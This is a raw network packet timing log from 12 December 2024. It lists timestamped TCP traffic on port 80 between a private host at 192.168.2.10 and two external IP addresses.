                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.316963911 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.317198992 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.317240000 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.317253113 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.317286968 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.318111897 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.318162918 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.318409920 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.318454981 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.318953991 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.318998098 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.319179058 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.319216967 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.319927931 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.319998026 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.320048094 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.320785046 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.320831060 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.320919991 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.320961952 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.321783066 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.321839094 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.321890116 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.321933031 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.322720051 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.322763920 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.323604107 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.323657990 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.323983908 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.324023008 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.324134111 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.324177027 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.324960947 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.325007915 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.325366974 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.325411081 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.325737953 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.325783014 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.325810909 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.325850964 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.326647997 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.326695919 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.327167034 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.327210903 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.327640057 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.327927113 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.327967882 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.328689098 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.328731060 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.328957081 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.329003096 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.329603910 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.329617023 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.329652071 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.330590963 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.330643892 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.330688953 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.330730915 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.331525087 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.331568003 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.331922054 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.332521915 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.332575083 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.333215952 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.333261013 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.333458900 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.333498955 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.333604097 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.333646059 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.334462881 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.334506035 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.335095882 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.335139036 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.335433960 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.335484028 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.336086035 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.336528063 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.336571932 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.337416887 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.337423086 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.337428093 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.337456942 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.337475061 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.338382006 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.338557959 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.338604927 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.339339972 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.339389086 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.339505911 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.339545012 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.340374947 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.340652943 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.340706110 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.341326952 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.341370106 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.341430902 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.341468096 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.341564894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.341737986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.342113018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.342221975 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.342276096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.342298031 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.342355013 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.342391968 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.343117952 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.343324900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.343709946 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.344126940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.344343901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.345118046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.345192909 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.345828056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.346381903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.346391916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.346457005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.346473932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.347152948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.347450972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.347521067 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.348151922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.349252939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.349261999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.349307060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.349344969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.350219965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.350256920 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.350858927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.351289034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.351298094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.351361990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.351377010 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.352277040 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.353305101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.353321075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.353338003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.353385925 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.353420973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.354270935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.355319023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.355329990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.355340958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.355424881 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.356318951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.356482983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.356569052 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.357285023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.357441902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.358356953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.358417034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.358438015 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.358449936 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.359328032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.359534979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.359618902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.360337973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.361540079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.361551046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.361593008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.361624956 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.361641884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.362601995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.362612009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.362682104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.364552975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.364738941 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.364835024 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.365211010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.365446091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.365883112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.365958929 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.365979910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.366590023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.366667032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.366904020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.366974115 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.367539883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.367969990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.368648052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.368721962 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.368732929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.369565010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.369566917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.369663954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.370592117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.370676041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.370913982 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.371617079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.371823072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.372528076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.372608900 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.372611046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.373022079 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.373639107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.373650074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.373729944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.374553919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.375869036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.375879049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.375963926 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.375987053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.376887083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.376986027 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.377135038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.377202034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.377799034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.377809048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.377880096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.378653049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.378995895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.379698992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.379709959 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.379968882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.380109072 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.380636930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.381676912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.381686926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.381757021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.381772995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.381817102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.382666111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.382855892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.382915974 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.383708000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.383899927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.383987904 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.384706020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.385205984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.385292053 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.385704041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.386157990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.386240959 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.386754990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.387775898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.387787104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.387798071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.387867928 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.387883902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.388804913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.388957977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.389039040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.389772892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.389836073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.389913082 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.390824080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.392106056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.392117023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.392131090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.392198086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.393143892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.393181086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.394269943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.394339085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.394352913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.394413948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.394427061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.395138025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.447252035 CET4994680192.168.2.10185.81.68.147
